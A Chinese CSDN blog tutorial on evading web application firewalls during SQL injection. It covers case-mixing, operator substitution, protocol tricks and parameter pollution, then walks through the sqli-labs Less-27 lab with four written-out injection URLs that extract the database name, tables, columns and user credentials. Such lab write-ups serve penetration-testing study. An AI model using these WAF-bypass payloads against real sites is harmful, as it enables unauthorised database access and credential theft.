绕过waf mysql爆库_waf绕过注入

本文介绍了WAF的工作原理以及如何通过白盒、黑盒和Fuzz方法绕过WAF的防护。详细展示了SQL注入攻击中如何利用各种技巧绕过WAF,包括利用大小写变形、等价替换、协议层面变换等方式,以及针对云WAF、主机防护软件和硬件防护软件的绕过策略。最后,通过Less-27实战例子演示了如何爆库、爆表、爆字段和爆数据。
摘要由CSDN通过智能技术生成

WAF 是什么?

全称 Web Application Firewall (WEB 应用防护系统),与传统的 Firewall (防火墙) 不同,WAF 针对的是应用层。

安全是一个不断对抗的过程,有防护手段,就有相应的绕过手段。

渗透测试过程中,WAF 是必定会遇到的,如何绕过 WAF 就是一个问题。

WAF绕过的手段千变万化,分为3类

白盒绕过

黑盒绕过

Fuzz绕过

白盒绕过

如果绕过:

大小写变形:Or,OR,oR

等价替换:and → && ,or → ||

……(例如 OorR)

白盒下的绕过主要针对源码进行审计,分析函数功能,构造特定的包进行绕过

黑盒绕过

架构层绕过 WAF

寻找源站(针对云 WAF)

利用同网段(绕过防护区域:例如WAF部署在同一网段的出口,使用网段的主机进行攻击,流量不经过WAF 。)

理解边界漏洞(绕过防护区域:例如利用 SSRF 对其内部进行测试)

资源限制角度绕过 WAF

POST大 BODY

协议层面绕过 WAF 的检测

请求方式变换:GET 变为 POST

Content-Type 变换:application/x-www-form-urlencoded;multipart/form-data;

参数 污染(在服务器交互的过程中,Http 允许 get 或者post 多次传同一个参数值,造成覆盖,配合WAF 解析的先后规则有可能绕过 WAF 的防护)

协议未覆盖绕过 WAF

SQL注释符的绕过

412f46e4540f27392c5ee85a995dc2d8.png

函数分割符号

6edb8d0be83ca12c0526faf0106adeaa.png

1、云waf:

在配置云waf是(通常是CDN包含的waf),dns需要解析到cdn的ip上去,在请求uri时,数据包就会先经过云waf进行检测,如果通过再将数据包流给主机。常见产品:阿里云防护,腾讯与防护,创于云等。

2、主机防护软件:

在主机上预先安装了这种防护软件,和监听web端口的流量是否有恶意的,所以这种从功能上讲,较为全面。常见产品:云锁,安全狗等。

3、硬件防护软件:

硬件waf可以理解为流量代理,一般部署方式都需要流量经过他,针对数据包进行拆包-》清洗-》规则名中国-》放行/丢弃。常见产品:各产品铁盒子waf

为什么waf可被绕过:

1、业务与安全存在一定冲突

2、waf无法100%覆盖语言,中间件,数据库的特性。

3、waf本身存在的漏洞。

waf白名单机制:

waf存在某些机制,不处理和拦截白名单中的请求数据:

1、指定IP或IP段的数据

2、来自于搜索引擎爬虫的访问数据。

3、其他特征的数据

Less-27实战演示:

注:因为我们输入的空格与--+这些符号都被系统处理为空,无法通过。这里我们用了空格,union,select,--+绕过,%09或%0a代替空格,'3  分号代表闭合,后面的代码就不会执行。

1、爆库 security

http://127.0.0.1/sqli/Less-27/?id=0%27%09UnIon%09SeLect%091,database(),'3

23e4cfb7c180fca660ea8d894e832578.png

2、爆表:users

http://127.0.0.1/sqli/Less-27/?id=0'%09UnIon%09SeLect%091,(SeLect%09group_concat(table_name)%09from%09information_schema.tables%09where%09table_schema=database()),'3

b574d6da7f177189a76c3e562baecb8d.png

3、爆字段:username,password

http://127.0.0.1/sqli/Less-27/?id=0'%09UnIon%09SeLect%091,(SeLect%09group_concat(column_name)%09from%09information_schema.columns%09where%09table_schema=database()%09and%09 table_name='users'),'3

84ea97b8ca7dcc9198ca8b97b9a33432.png

4、爆数据:username,password

http://127.0.0.1/sqli/Less-27/?id=0'%09UnIon%09SeLect%091,(SeLect%09group_concat(username,password)%09from%09users),'3

440c8eb278da1480d005aaeda0c02919.png

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值